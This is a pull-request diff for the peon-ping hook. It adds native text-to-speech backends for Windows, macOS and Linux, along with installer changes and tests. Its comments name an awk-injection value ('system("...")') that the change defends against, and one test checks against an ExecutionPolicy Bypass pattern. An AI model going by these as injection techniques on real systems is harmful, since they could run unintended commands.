### PR TITLE
feat(tts-native): platform-native TTS backends for macOS, Linux, Windows

### DIFF
--- a/install.ps1
+++ b/install.ps1
@@ -347,6 +347,22 @@ if (Test-Path $hookHandleUsePs1Source) {
     }
 }
 
+# --- Install tts-native.ps1 (Windows SAPI5 TTS backend) ---
+$ttsNativeSource = Join-Path $ScriptDir "scripts\tts-native.ps1"
+$ttsNativeTarget = Join-Path $scriptsDir "tts-native.ps1"
+
+if (Test-Path $ttsNativeSource) {
+    # Local install: copy from repo
+    Copy-Item -Path $ttsNativeSource -Destination $ttsNativeTarget -Force
+} else {
+    # One-liner install: download from GitHub
+    try {
+        Invoke-WebRequest -Uri "$RepoBase/scripts/tts-native.ps1" -OutFile $ttsNativeTarget -UseBasicParsing -ErrorAction Stop
+    } catch {
+        Write-Host "  Warning: Could not download tts-native.ps1" -ForegroundColor Yellow
+    }
+}
+
 # --- Install the main hook script (PowerShell) ---
 $hookScript = @'
 # peon-ping hook for Claude Code (Windows native)
@@ -3112,9 +3128,19 @@ foreach ($adapterFile in $adapterFiles) {
 Write-Host "  Installed $($adapterFiles.Count) adapter scripts to $adaptersDir"
 
 # --- Install CLI shortcut ---
+# Prefer pwsh (PowerShell 7+) when available, fall back to Windows PowerShell 5.1.
+# pwsh has its own clean module path; powershell.exe can fail when PSModulePath
+# leaks PS 7 module dirs in front of the 5.1 inbox modules (seen on dev
+# environments where CloudSDK or similar polluted PSModulePath) — symptom is
+# "Microsoft.PowerShell.Security module could not be loaded" on Get-ExecutionPolicy.
 $peonCli = @"
 @echo off
-powershell -NoProfile -NonInteractive -Command "& '%USERPROFILE%\.claude\hooks\peon-ping\peon.ps1' %*"
+where pwsh >nul 2>&1
+if %ERRORLEVEL% equ 0 (
+    pwsh -NoProfile -NonInteractive -Command "& '%USERPROFILE%\.claude\hooks\peon-ping\peon.ps1' %*"
+) else (
+    powershell -NoProfile -NonInteractive -Command "& '%USERPROFILE%\.claude\hooks\peon-ping\peon.ps1' %*"
+)
 "@
 $cliBinDir = Join-Path $env:USERPROFILE ".local\bin"
 if (-not (Test-Path $cliBinDir)) {
@@ -3125,13 +3151,19 @@ $cliBatPath = Join-Path $cliBinDir "peon.cmd"
 $utf8NoBom = New-Object System.Text.UTF8Encoding $false
 [System.IO.File]::WriteAllLines($cliBatPath, $peonCli.Split("`n"), $utf8NoBom)
 
-# Also create a bash-compatible script for Git Bash / WSL
-# Use the actual Windows path (resolved at install time) to avoid path translation issues
+# Also create a bash-compatible script for Git Bash / WSL.
+# Use the actual Windows path (resolved at install time) to avoid path translation issues.
+# Same pwsh-then-powershell preference as peon.cmd above.
 $peonPs1Path = Join-Path $InstallDir "peon.ps1"
 $peonShScript = @"
 #!/usr/bin/env bash
 # peon-ping CLI wrapper for Git Bash / WSL / Unix shells on Windows
-powershell.exe -NoProfile -NonInteractive -Command "& '$peonPs1Path' `$*"
+if command -v pwsh >/dev/null 2>&1; then
+    PS_EXE=pwsh
+else
+    PS_EXE=powershell.exe
+fi
+"`$PS_EXE" -NoProfile -NonInteractive -Command "& '$peonPs1Path' `$*"
 "@
 $peonShPath = Join-Path $cliBinDir "peon"
 [System.IO.File]::WriteAllLines($peonShPath, $peonShScript.Split("`n"), $utf8NoBom)

--- a/install.sh
+++ b/install.sh
@@ -591,6 +591,7 @@ else
   curl -fsSL "$REPO_BASE/scripts/pack-download.sh" -o "$INSTALL_DIR/scripts/pack-download.sh" 2>/dev/null || true
   curl -fsSL "$REPO_BASE/scripts/mac-overlay.js" -o "$INSTALL_DIR/scripts/mac-overlay.js" 2>/dev/null || true
   curl -fsSL "$REPO_BASE/scripts/notify.sh" -o "$INSTALL_DIR/scripts/notify.sh" 2>/dev/null || true
+  curl -fsSL "$REPO_BASE/scripts/tts-native.sh" -o "$INSTALL_DIR/scripts/tts-native.sh" 2>/dev/null || true
   mkdir -p "$INSTALL_DIR/docs"
   curl -fsSL "$REPO_BASE/docs/peon-icon.png" -o "$INSTALL_DIR/docs/peon-icon.png" 2>/dev/null || true
   if [ "$UPDATING" = false ]; then
@@ -674,6 +675,7 @@ chmod +x "$INSTALL_DIR/scripts/hook-handle-use.sh" 2>/dev/null || true
 chmod +x "$INSTALL_DIR/scripts/hook-handle-rename.sh" 2>/dev/null || true
 chmod +x "$INSTALL_DIR/scripts/pack-download.sh" 2>/dev/null || true
 chmod +x "$INSTALL_DIR/scripts/notify.sh" 2>/dev/null || true
+chmod +x "$INSTALL_DIR/scripts/tts-native.sh" 2>/dev/null || true
 
 # --- Build peon-play (macOS Sound Effects device support) ---
 if [ "$PLATFORM" = "mac" ] && command -v swiftc &>/dev/null; then

--- a/scripts/tts-native.ps1
+++ b/scripts/tts-native.ps1
@@ -1,0 +1,224 @@
+<#
+.SYNOPSIS
+    Windows native TTS backend for peon-ping. Speaks stdin text via SAPI5
+    (System.Speech.Synthesis). Fire-and-forget: exit code is always 0, all
+    errors are contained, and no output is produced during normal hook
+    invocations. Debug diagnostics are routed to stderr and gated on
+    PEON_DEBUG=1.
+
+.DESCRIPTION
+    Invoked from peon.ps1's Invoke-TtsSpeak helper with decoded plain-text
+    piped on stdin and voice/rate/volume passed as named parameters. Base64
+    encoding lives in Invoke-TtsSpeak (it guards the Start-Process -Command
+    boundary) -- bytes arriving here are already UTF-8 text.
+
+    Rate and volume are normalized at the integration layer to platform-
+    independent floats (rate: 0.0-2.0 with 1.0 = normal; volume: 0.0-1.0)
+    and mapped internally to SAPI5's native units (rate int -10..+10,
+    volume int 0..100) with clamping.
+
+    Under PEON_TTS_DRY_RUN=1 the script writes the resolved synthesis
+    parameters as JSON to PEON_TTS_TRACE_FILE and skips the Speak call.
+    This test hook lets Pester verify behaviour without driving real SAPI.
+
+.PARAMETER InputText
+    Pipeline input. Each object piped in becomes a line of the buffer;
+    trailing whitespace is trimmed before synthesis. Empty or whitespace-
+    only input exits 0 without calling Speak.
+
+.PARAMETER Voice
+    SAPI5 voice name (exact match against GetInstalledVoices output) or
+    the sentinel string "default" to use the engine default. A requested
+    voice that is not installed falls through to the default with a debug
+    line when PEON_DEBUG=1. Default: "default".
+
+.PARAMETER Rate
+    Float, 0.0-2.0. 1.0 is normal speed, 0.5 is half, 2.0 is double.
+    Mapped to SAPI int via [math]::Round((Rate-1.0)*10) and clamped to
+    -10..+10. Default: 1.0.
+
+.PARAMETER Vol
+    Float, 0.0-1.0. 0.0 is silent, 1.0 is full volume. Mapped to SAPI int
+    via [math]::Round(Vol*100) and clamped to 0..100. Default: 0.5.
+
+.PARAMETER ListVoices
+    If set, prints installed SAPI voice names to stdout (one per line)
+    and exits 0 without reading stdin or calling Speak.
+
+.EXAMPLE
+    "hello world" | .\tts-native.ps1 -Voice "Microsoft David" -Rate 1.0 -Vol 0.5
+
+.EXAMPLE
+    .\tts-native.ps1 -ListVoices
+#>
+param(
+    [Parameter(ValueFromPipeline = $true)]
+    [string]$InputText,
+    [string]$Voice = "default",
+    [double]$Rate = 1.0,
+    [double]$Vol = 0.5,
+    [switch]$ListVoices
+)
+
+begin {
+    $script:PeonDebug = ($env:PEON_DEBUG -eq "1")
+    $script:DryRun = ($env:PEON_TTS_DRY_RUN -eq "1")
+    $script:TracePath = $env:PEON_TTS_TRACE_FILE
+
+    function Write-DebugLine {
+        param([string]$Message)
+        if ($script:PeonDebug) {
+            [Console]::Error.WriteLine("[tts-native] $Message")
+        }
+    }
+
+    function Write-Trace {
+        param([hashtable]$Fields)
+        if (-not $script:DryRun) { return }
+        if (-not $script:TracePath) { return }
+        try {
+            $json = $Fields | ConvertTo-Json -Depth 4 -Compress
+            Set-Content -Path $script:TracePath -Value $json -Encoding UTF8
+        } catch {
+            Write-DebugLine "trace write failed: $_"
+        }
+    }
+
+    # Load System.Speech. If this fails (PowerShell 7 Core on non-Windows,
+    # missing assembly, etc.) fall through to a no-op path. In dry-run mode
+    # voice enumeration and synthesis are stubbed so tests work on runners
+    # without a real SAPI stack.
+    $script:SpeechLoaded = $false
+    try {
+        Add-Type -AssemblyName System.Speech -ErrorAction Stop
+        $script:SpeechLoaded = $true
+    } catch {
+        Write-DebugLine "failed to load System.Speech: $_"
+    }
+
+    # --- -ListVoices short-circuit: runs in begin, exits before process/end ---
+    if ($ListVoices) {
+        if ($script:SpeechLoaded) {
+            try {
+                $enumSynth = [System.Speech.Synthesis.SpeechSynthesizer]::new()
+                $enumSynth.GetInstalledVoices() | ForEach-Object {
+                    [Console]::Out.WriteLine($_.VoiceInfo.Name)
+                }
+                $enumSynth.Dispose()
+            } catch {
+                Write-DebugLine "voice enumeration failed: $_"
+            }
+        }
+        exit 0
+    }
+
+    $script:Buffer = New-Object System.Text.StringBuilder
+}
+
+process {
+    # Pipeline input arrives here one object at a time. Empty values are
+    # skipped so they do not inject blank lines into the buffer.
+    if ($null -ne $InputText -and $InputText.Length -gt 0) {
+        [void]$script:Buffer.AppendLine($InputText)
+    }
+}
+
+end {
+    $text = $script:Buffer.ToString().TrimEnd()
+
+    # Fallback: if invoked via `powershell.exe -File tts-native.ps1` the
+    # PowerShell pipeline does not bind piped stdin to $InputText -- stdin
+    # belongs to powershell.exe itself. Read the redirected console stream
+    # directly so the DoD smoke test (`"text" | powershell -File ...`) and
+    # external callers behave the same as an in-process pipeline.
+    if (-not $text) {
+        try {
+            if ([Console]::IsInputRedirected) {
+                $stdin = [Console]::In.ReadToEnd()
+                if ($stdin) { $text = $stdin.TrimEnd() }
+            }
+        } catch {
+            Write-DebugLine "stdin read failed: $_"
+        }
+    }
+
+    if (-not $text) {
+        Write-Trace @{ Spoke = $false; Reason = "empty-input" }
+        exit 0
+    }
+
+    # Unit conversions. Pure arithmetic -- no engine calls yet.
+    $sapiRate = [int][math]::Round(($Rate - 1.0) * 10)
+    $sapiRate = [math]::Max(-10, [math]::Min(10, $sapiRate))
+
+    $sapiVolume = [int][math]::Round($Vol * 100)
+    $sapiVolume = [math]::Max(0, [math]::Min(100, $sapiVolume))
+
+    # Voice resolution. The "default" sentinel means "do not call SelectVoice";
+    # any explicit name is looked up in the installed voices list. A miss
+    # emits a debug line and falls through to the engine default.
+    $selectVoiceCalled = $false
+    $selectedVoice = $null
+    $installedVoices = @()
+
+    if ($script:SpeechLoaded) {
+        try {
+            $probe = [System.Speech.Synthesis.SpeechSynthesizer]::new()
+            $installedVoices = @($probe.GetInstalledVoices() | ForEach-Object { $_.VoiceInfo.Name })
+            $probe.Dispose()
+        } catch {
+            Write-DebugLine "voice probe failed: $_"
+        }
+    }
+
+    $voiceToSelect = $null
+    if ($Voice -and $Voice -ne "default") {
+        if ($installedVoices -contains $Voice) {
+            $voiceToSelect = $Voice
+            $selectVoiceCalled = $true
+            $selectedVoice = $Voice
+        } else {
+            Write-DebugLine "voice '$Voice' not installed; using default"
+        }
+    }
+
+    if ($script:DryRun) {
+        Write-Trace @{
+            Spoke             = $true
+            Text              = $text
+            SapiRate          = $sapiRate
+            SapiVolume        = $sapiVolume
+            SelectVoiceCalled = $selectVoiceCalled
+            SelectedVoice     = $selectedVoice
+            RequestedVoice    = $Voice
+        }
+        exit 0
+    }
+
+    if (-not $script:SpeechLoaded) {
+        # Nothing more to do -- Add-Type failed, we already logged the reason.
+        exit 0
+    }
+
+    try {
+        $synth = [System.Speech.Synthesis.SpeechSynthesizer]::new()
+        $synth.Rate = $sapiRate
+        $synth.Volume = $sapiVolume
+
+        if ($voiceToSelect) {
+            try {
+                $synth.SelectVoice($voiceToSelect)
+            } catch {
+                Write-DebugLine "SelectVoice('$voiceToSelect') failed: $_"
+            }
+        }
+
+        $synth.Speak($text)
+        $synth.Dispose()
+    } catch {
+        Write-DebugLine "SAPI5 synthesis failed: $_"
+        # Do not propagate -- hook must not fail on TTS errors.
+    }
+
+    exit 0
+}

--- a/scripts/tts-native.sh
+++ b/scripts/tts-native.sh
@@ -1,0 +1,229 @@
+#!/bin/bash
+# peon-ping: Unix platform-native TTS backend
+#
+# Routes speech through the OS's built-in TTS engine:
+#   Darwin        → macOS `say`
+#   Linux         → piper (if installed + model file present) → espeak-ng
+#   MINGW*/MSYS*  → bridges to scripts/tts-native.ps1 via powershell.exe
+#   anything else → silent exit 0
+#
+# Usage:
+#   echo "text to speak" | tts-native.sh <voice> <rate> <volume>
+#   tts-native.sh --list-voices
+#
+# Positional args:
+#   voice   engine-specific voice name (e.g. "Alex" on macOS, "en-us" for
+#           espeak-ng, "Microsoft David" on Windows) or "default" for the
+#           engine default.
+#   rate    float; 1.0 = normal speed, 0.5 = half, 2.0 = double.
+#   volume  float 0.0-1.0 (silent .. full). Ignored on macOS `say` and
+#           piper+aplay — see docs/designs/tts-native.md §Risks.
+#
+# Stdin:   one line of text to speak (read verbatim, no interpolation).
+# Stdout:  empty during normal invocations. `--list-voices` prints one
+#          voice name per line.
+# Stderr:  empty unless PEON_DEBUG=1, in which case diagnostics are
+#          prefixed with `[tts-native]`.
+# Exit:    always 0 — TTS failure must not fail the calling hook.
+#
+# Env vars:
+#   PEON_DEBUG            "1" enables stderr diagnostics
+#   PEON_DIR              peon-ping install dir (auto-resolved from $0)
+#   PEON_PIPER_MODEL      absolute path to a .onnx model (overrides default)
+#   PEON_PIPER_MODEL_DIR  dir scanned by --list-voices for model basenames
+#
+# See docs/designs/tts-native.md and docs/adr/ADR-001-tts-backend-architecture.md
+# for the full specification.
+
+set -uo pipefail
+
+PEON_DEBUG="${PEON_DEBUG:-0}"
+
+_debug() {
+  [ "$PEON_DEBUG" = "1" ] && printf '[tts-native] %s\n' "$*" >&2
+  return 0
+}
+
+# --- Resolve PEON_DIR ---
+if [ -z "${PEON_DIR:-}" ]; then
+  PEON_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+fi
+
+# Documents that $1 is intentionally unused on engines without per-invocation
+# volume support (macOS `say`, piper+aplay). Keeps shellcheck quiet and
+# makes the omission auditable.
+_ignore_unused_volume() {
+  :  # arg intentionally unused
+}
+
+# --- Engine: macOS `say` ---
+_speak_macos() {
+  local text="$1" voice="$2" rate="$3" volume="$4"
+  _ignore_unused_volume "$volume"
+
+  # Pass rate as awk -v variable so a hostile config.json cannot inject awk
+  # code (e.g. a rate string of 'system("...")'). See card w3ciyq.
+  local wpm
+  wpm=$(awk -v r="$rate" 'BEGIN { printf "%d", r * 200 }')
+
+  if [ "$voice" = "default" ]; then
+    say -r "$wpm" -- "$text" 2>/dev/null || _debug "say failed"
+  else
+    say -v "$voice" -r "$wpm" -- "$text" 2>/dev/null || _debug "say failed"
+  fi
+}
+
+# --- Engine: piper (neural TTS, Linux preferred path) ---
+_speak_piper() {
+  local text="$1" model="$2" rate="$3"
+  # Pass rate as awk -v variable so a hostile config.json cannot inject awk
+  # code via the rate string. See card w3ciyq.
+  local length_scale
+  length_scale=$(awk -v r="$rate" 'BEGIN { printf "%.2f", 1.0 / r }')
+
+  # Read sample rate from the model's .onnx.json sidecar; default 22050.
+  local sidecar="${model}.json"
+  local rate_hz=22050
+  if [ -f "$sidecar" ]; then
+    local parsed
+    parsed=$(python3 -c "import json,sys
+try:
+  with open(sys.argv[1]) as f:
+    print(json.load(f)['audio']['sample_rate'])
+except Exception:
+  sys.exit(1)
+" "$sidecar" 2>/dev/null) && rate_hz="$parsed"
+  fi
+
+  printf '%s\n' "$text" \
+    | piper --model "$model" --length-scale "$length_scale" --output-raw 2>/dev/null \
+    | aplay -q -r "$rate_hz" -f S16_LE -t raw 2>/dev/null \
+    || _debug "piper pipeline failed"
+}
+
+# --- Engine: espeak-ng (Linux fallback) ---
+_speak_espeak_ng() {
+  local text="$1" voice="$2" rate="$3" volume="$4"
+  # Pass rate/volume as awk -v variables so hostile config.json values cannot
+  # inject awk code (e.g. a rate string of 'system("...")'). See card w3ciyq.
+  local wpm amplitude
+  wpm=$(awk -v r="$rate" 'BEGIN { printf "%d", r * 175 }')
+  amplitude=$(awk -v v="$volume" 'BEGIN { printf "%d", v * 100 }')
+
+  if [ "$voice" = "default" ]; then
+    espeak-ng -s "$wpm" -a "$amplitude" -- "$text" 2>/dev/null || _debug "espeak-ng failed"
+  else
+    espeak-ng -v "$voice" -s "$wpm" -a "$amplitude" -- "$text" 2>/dev/null || _debug "espeak-ng failed"
+  fi
+}
+
+# --- Linux dispatcher: piper → espeak-ng → silent exit ---
+_speak_linux() {
+  local text="$1" voice="$2" rate="$3" volume="$4"
+
+  local piper_model="${PEON_PIPER_MODEL:-$PEON_DIR/piper-models/en_US-lessac-medium.onnx}"
+  if command -v piper >/dev/null 2>&1 && [ -f "$piper_model" ]; then
+    _speak_piper "$text" "$piper_model" "$rate"
+    return 0
+  fi
+
+  if command -v espeak-ng >/dev/null 2>&1; then
+    _speak_espeak_ng "$text" "$voice" "$rate" "$volume"
+    return 0
+  fi
+
+  _debug "no TTS engine found on Linux (tried piper, espeak-ng)"
+}
+
+# --- MSYS2/MINGW bridge to tts-native.ps1 ---
+_speak_via_powershell() {
+  local text="$1" voice="$2" rate="$3" volume="$4"
+  local ps_script="$PEON_DIR/scripts/tts-native.ps1"
+  if [ ! -f "$ps_script" ]; then
+    _debug "tts-native.ps1 not found at $ps_script"
+    return 0
+  fi
+  # -File preserves stdin bytes; named params avoid -Command metacharacter
+  # issues. Base64 encoding is handled only at the hook→Start-Process boundary
+  # on native Windows (Invoke-TtsSpeak), not here.
+  printf '%s\n' "$text" \
+    | powershell.exe -NoProfile -File "$ps_script" \
+        -Voice "$voice" -Rate "$rate" -Vol "$volume" 2>/dev/null \
+    || _debug "powershell tts-native.ps1 failed"
+}
+
+# --- Voice enumeration per platform ---
+_list_voices_macos() {
+  # `say -v '?'` emits a whitespace-padded table; first column is the voice.
+  say -v '?' 2>/dev/null | awk 'NF { print $1 }'
+}
+
+_list_voices_linux() {
+  # Piper models (if a model dir is present) ordered first — they take
+  # priority as the active engine when installed.
+  local piper_dir="${PEON_PIPER_MODEL_DIR:-$PEON_DIR/piper-models}"
+  if command -v piper >/dev/null 2>&1 && [ -d "$piper_dir" ]; then
+    find "$piper_dir" -maxdepth 1 -name '*.onnx' -print 2>/dev/null \
+      | while IFS= read -r m; do
+          basename "$m" .onnx
+        done | sort
+  fi
+  if command -v espeak-ng >/dev/null 2>&1; then
+    # `espeak-ng --voices` emits a header row + "Pty Language Age/Gender
+    # VoiceName File ..." columns; the 4th column is the voice name.
+    espeak-ng --voices 2>/dev/null | awk 'NR>1 && $4 != "" { print $4 }'
+  fi
+}
+
+_list_voices_powershell() {
+  local ps_script="$PEON_DIR/scripts/tts-native.ps1"
+  if [ ! -f "$ps_script" ]; then
+    _debug "tts-native.ps1 not found — cannot list voices"
+    return 0
+  fi
+  powershell.exe -NoProfile -File "$ps_script" -ListVoices 2>/dev/null \
+    || _debug "powershell tts-native.ps1 -ListVoices failed"
+}
+
+_list_voices() {
+  case "$(uname -s)" in
+    Darwin)       _list_voices_macos ;;
+    Linux)        _list_voices_linux ;;
+    MINGW*|MSYS*) _list_voices_powershell ;;
+    *)            _debug "unsupported platform: $(uname -s)" ;;
+  esac
+}
+
+# --- Entry point ---
+
+# List-voices mode runs before stdin read so `--list-voices` does not block
+# on a tty.
+if [ "${1:-}" = "--list-voices" ]; then
+  _list_voices
+  exit 0
+fi
+
+voice="${1:-default}"
+rate="${2:-1.0}"
+volume="${3:-0.5}"
+
+# Read one line of text from stdin. If nothing arrives (no input, EOF, or
+# whitespace-only line), exit silently — the hook pipeline sometimes invokes
+# speak() with empty text and TTS must not complain.
+IFS= read -r text || text=""
+# Strip surrounding whitespace to detect "whitespace-only" input.
+stripped="${text//[[:space:]]/}"
+if [ -z "$stripped" ]; then
+  _debug "empty input text"
+  exit 0
+fi
+
+case "$(uname -s)" in
+  Darwin)       _speak_macos "$text" "$voice" "$rate" "$volume" ;;
+  Linux)        _speak_linux "$text" "$voice" "$rate" "$volume" ;;
+  MINGW*|MSYS*) _speak_via_powershell "$text" "$voice" "$rate" "$volume" ;;
+  *)            _debug "unsupported platform: $(uname -s)" ;;
+esac
+
+# Always exit 0 — TTS failure must never propagate to the caller.
+exit 0

--- a/tests/adapters-windows.Tests.ps1
+++ b/tests/adapters-windows.Tests.ps1
@@ -71,7 +71,8 @@ Describe "Core Script Syntax Validation" {
     It "<name> has valid PowerShell syntax" -ForEach @(
         @{ name = "install.ps1" },
         @{ name = "scripts/win-play.ps1" },
-        @{ name = "scripts/win-notify.ps1" }
+        @{ name = "scripts/win-notify.ps1" },
+        @{ name = "scripts/tts-native.ps1" }
     ) {
         $path = Join-Path $script:RepoRoot $name
         $path | Should -Exist
@@ -684,6 +685,13 @@ Describe "install.ps1 Adapter Installation" {
     It "installs win-notify.ps1 alongside win-play.ps1" {
         $script:installContent | Should -Match 'win-notify\.ps1'
     }
+
+    It "installs tts-native.ps1 (Windows SAPI5 TTS backend)" {
+        # Matches the install.ps1 block that copies / downloads the script
+        # into the scripts directory. Paired with the win-notify test above.
+        $script:installContent | Should -Match 'scripts\\tts-native\.ps1'
+        $script:installContent | Should -Match 'scripts/tts-native\.ps1'
+    }
 }
 
 # ============================================================
@@ -850,6 +858,101 @@ Describe "win-notify.ps1 Toast Script" {
     It "wraps in try/catch for silent degradation" {
         $script:winNotifyContent | Should -Match 'try \{'
         $script:winNotifyContent | Should -Match 'catch \{'
+    }
+}
+
+# ============================================================
+# tts-native.ps1 Windows SAPI5 TTS Backend
+# ============================================================
+# Structural assertions for the native Windows TTS script. Behaviour is
+# covered by tests/tts-native.Tests.ps1; this file only confirms that the
+# script exists, parses, declares the expected parameters, and cannot
+# bypass execution policy. Keeping shape checks here keeps them alongside
+# the other `.ps1` structural suites (win-play, win-notify, etc.).
+
+Describe "tts-native.ps1 Windows SAPI5 TTS Backend" {
+    BeforeAll {
+        $script:ttsNativePath = Join-Path (Join-Path $script:RepoRoot "scripts") "tts-native.ps1"
+        $script:ttsNativeContent = Get-Content $script:ttsNativePath -Raw
+    }
+
+    It "exists in scripts/" {
+        $script:ttsNativePath | Should -Exist
+    }
+
+    It "has valid PowerShell syntax" {
+        $errors = $null
+        $null = [System.Management.Automation.PSParser]::Tokenize($script:ttsNativeContent, [ref]$errors)
+        $errors.Count | Should -Be 0
+    }
+
+    It "has a comment-based help header with SYNOPSIS / PARAMETER / EXAMPLE" {
+        $script:ttsNativeContent | Should -Match '(?s)^\s*<#.*\.SYNOPSIS.*\.PARAMETER.*\.EXAMPLE.*#>'
+    }
+
+    It "declares InputText as a pipeline-bound string parameter" {
+        $script:ttsNativeContent | Should -Match '(?s)\[Parameter\(\s*ValueFromPipeline\s*=\s*\$true\s*\)\][^}]*\[string\]\s*\$InputText'
+    }
+
+    It "declares Voice parameter with 'default' default" {
+        $script:ttsNativeContent | Should -Match '\[string\]\s*\$Voice\s*=\s*"default"'
+    }
+
+    It "declares Rate parameter as [double] with 1.0 default" {
+        $script:ttsNativeContent | Should -Match '\[double\]\s*\$Rate\s*=\s*1\.0'
+    }
+
+    It "declares Vol parameter as [double] with 0.5 default" {
+        $script:ttsNativeContent | Should -Match '\[double\]\s*\$Vol\s*=\s*0\.5'
+    }
+
+    It "declares ListVoices as a [switch]" {
+        $script:ttsNativeContent | Should -Match '\[switch\]\s*\$ListVoices'
+    }
+
+    It "uses begin/process/end blocks to accumulate pipeline input" {
+        $script:ttsNativeContent | Should -Match '(?ms)^\s*begin\s*\{'
+        $script:ttsNativeContent | Should -Match '(?ms)^\s*process\s*\{'
+        $script:ttsNativeContent | Should -Match '(?ms)^\s*end\s*\{'
+    }
+
+    It "loads the System.Speech assembly" {
+        $script:ttsNativeContent | Should -Match 'Add-Type\s+-AssemblyName\s+System\.Speech'
+    }
+
+    It "instantiates SpeechSynthesizer" {
+        $script:ttsNativeContent | Should -Match 'System\.Speech\.Synthesis\.SpeechSynthesizer'
+    }
+
+    It "applies the SAPI rate mapping [int][math]::Round((Rate-1.0)*10)" {
+        $script:ttsNativeContent | Should -Match '\[int\]\[math\]::Round\(\s*\(\s*\$Rate\s*-\s*1\.0\s*\)\s*\*\s*10\s*\)'
+    }
+
+    It "applies the SAPI volume mapping [int][math]::Round(Vol*100)" {
+        $script:ttsNativeContent | Should -Match '\[int\]\[math\]::Round\(\s*\$Vol\s*\*\s*100\s*\)'
+    }
+
+    It "clamps SAPI rate into -10..+10" {
+        $script:ttsNativeContent | Should -Match '\[math\]::Max\(\s*-10'
+        $script:ttsNativeContent | Should -Match '\[math\]::Min\(\s*10'
+    }
+
+    It "clamps SAPI volume into 0..100" {
+        $script:ttsNativeContent | Should -Match '\[math\]::Max\(\s*0'
+        $script:ttsNativeContent | Should -Match '\[math\]::Min\(\s*100'
+    }
+
+    It "routes debug diagnostics through PEON_DEBUG" {
+        $script:ttsNativeContent | Should -Match 'PEON_DEBUG'
+    }
+
+    It "wraps SpeechSynthesizer invocation in try/catch" {
+        $script:ttsNativeContent | Should -Match 'try\s*\{'
+        $script:ttsNativeContent | Should -Match 'catch\s*\{'
+    }
+
+    It "does not use ExecutionPolicy Bypass" {
+        $script:ttsNativeContent | Should -Not -Match "ExecutionPolicy Bypass"
     }
 }
 
@@ -1633,6 +1736,25 @@ Describe "install.ps1 Default Config" {
     It "creates CLI wrappers for both cmd and bash" {
         $script:installContent | Should -Match 'peon\.cmd'
         $script:installContent | Should -Match '#!/usr/bin/env bash'
+    }
+
+    It "peon.cmd shim probes for pwsh before falling back to powershell" {
+        # pwsh-first avoids the PS 5.1 / PS 7 PSModulePath clash where 5.1 can
+        # load PS 7's incompatible Security module and fail to resolve
+        # Get-ExecutionPolicy. If pwsh is installed, prefer it; else use
+        # powershell.exe. Structural test on the install.ps1 here-string.
+        $script:installContent | Should -Match 'where pwsh'
+        $script:installContent | Should -Match 'pwsh -NoProfile -NonInteractive -Command "& ''%USERPROFILE%\\.claude\\hooks\\peon-ping\\peon\.ps1'''
+        $script:installContent | Should -Match 'powershell -NoProfile -NonInteractive -Command "& ''%USERPROFILE%\\.claude\\hooks\\peon-ping\\peon\.ps1'''
+    }
+
+    It "peon bash shim probes for pwsh before falling back to powershell" {
+        # Same resiliency on the bash wrapper. command -v pwsh decides; both
+        # branches pass -NoProfile -NonInteractive -Command to whichever
+        # executable wins.
+        $script:installContent | Should -Match 'command -v pwsh'
+        $script:installContent | Should -Match 'PS_EXE=pwsh'
+        $script:installContent | Should -Match 'PS_EXE=powershell\.exe'
     }
 
     It "validates pack names with safe charset" {

--- a/tests/peon-packs.Tests.ps1
+++ b/tests/peon-packs.Tests.ps1
@@ -188,12 +188,17 @@ Describe "Windows CLI + runtime parity for ide_rules and exclude_dirs" {
         $script:ProjectDir = Join-Path $script:WorktreesDir "project-a"
         New-Item -ItemType Directory -Path $script:ProjectDir -Force | Out-Null
         # Canonicalize to the long-path form. On GH Windows runners $env:TEMP
-        # resolves to a short-name path (C:\Users\RUNNER~1\...), while Set-Location
-        # + $PWD.Path inside the spawned shell returns the long form. Without this,
-        # Test-PathRuleMatch would compare short-form config values against
-        # long-form PWD and miss the match.
-        $script:WorktreesDir = (Resolve-Path -LiteralPath $script:WorktreesDir).Path
-        $script:ProjectDir   = (Resolve-Path -LiteralPath $script:ProjectDir).Path
+        # resolves to a short-name path (C:\Users\RUNNER~1\...). Resolve-Path
+        # preserves 8.3 short names, but Set-Location + $PWD.Path expands them
+        # to the long form — which is what peon.ps1 sees when the spawned shell
+        # does Set-Location. Use the Set-Location round-trip so config values
+        # and $PWD.Path stay in the same form.
+        Push-Location -LiteralPath $script:WorktreesDir
+        $script:WorktreesDir = $PWD.Path
+        Pop-Location
+        Push-Location -LiteralPath $script:ProjectDir
+        $script:ProjectDir = $PWD.Path
+        Pop-Location
     }
 
     AfterEach {
@@ -267,7 +272,7 @@ Describe "Windows CLI + runtime parity for ide_rules and exclude_dirs" {
         $cfg.ide_rules = @([pscustomobject]@{ ide = "codex"; pack = "sc_kerrigan" })
         $cfg | ConvertTo-Json -Depth 10 | Set-Content (Join-Path $script:TestDir "config.json") -Encoding UTF8
 
-        $result = & powershell.exe -NoProfile -Command "`$env:PEON_IDE='codex'; Set-Location '$script:ProjectDir'; & '$script:PeonPath' --status --verbose 2>&1"
+        $result = & powershell.exe -NoProfile -Command "`$env:PEON_IDE='codex'; Set-Location -LiteralPath '$script:ProjectDir'; & '$script:PeonPath' --status --verbose 2>&1"
         $output = $result -join "`n"
         $output | Should -Match "IDE source \(status\): codex"
         $output | Should -Match "path rules: 1 configured"

--- a/tests/peon-packs.Tests.ps1
+++ b/tests/peon-packs.Tests.ps1
@@ -187,6 +187,13 @@ Describe "Windows CLI + runtime parity for ide_rules and exclude_dirs" {
         $script:WorktreesDir = Join-Path $script:TestDir "worktrees"
         $script:ProjectDir = Join-Path $script:WorktreesDir "project-a"
         New-Item -ItemType Directory -Path $script:ProjectDir -Force | Out-Null
+        # Canonicalize to the long-path form. On GH Windows runners $env:TEMP
+        # resolves to a short-name path (C:\Users\RUNNER~1\...), while Set-Location
+        # + $PWD.Path inside the spawned shell returns the long form. Without this,
+        # Test-PathRuleMatch would compare short-form config values against
+        # long-form PWD and miss the match.
+        $script:WorktreesDir = (Resolve-Path -LiteralPath $script:WorktreesDir).Path
+        $script:ProjectDir   = (Resolve-Path -LiteralPath $script:ProjectDir).Path
     }
 
     AfterEach {

--- a/tests/setup.bash
+++ b/tests/setup.bash
@@ -1,5 +1,19 @@
 # Common test setup for peon-ping bats tests
 
+# Resolve python3 via PATH (not the Linux-only /usr/bin/python3) so the
+# harness works on macOS, Linux, and Git Bash for Windows without
+# hardcoded absolute paths. See card w3ciyq.
+if [ -z "${PEON_PY:-}" ]; then
+  if PEON_PY="$(command -v python3 2>/dev/null)" && [ -n "$PEON_PY" ]; then
+    export PEON_PY
+  elif PEON_PY="$(command -v python 2>/dev/null)" && [ -n "$PEON_PY" ]; then
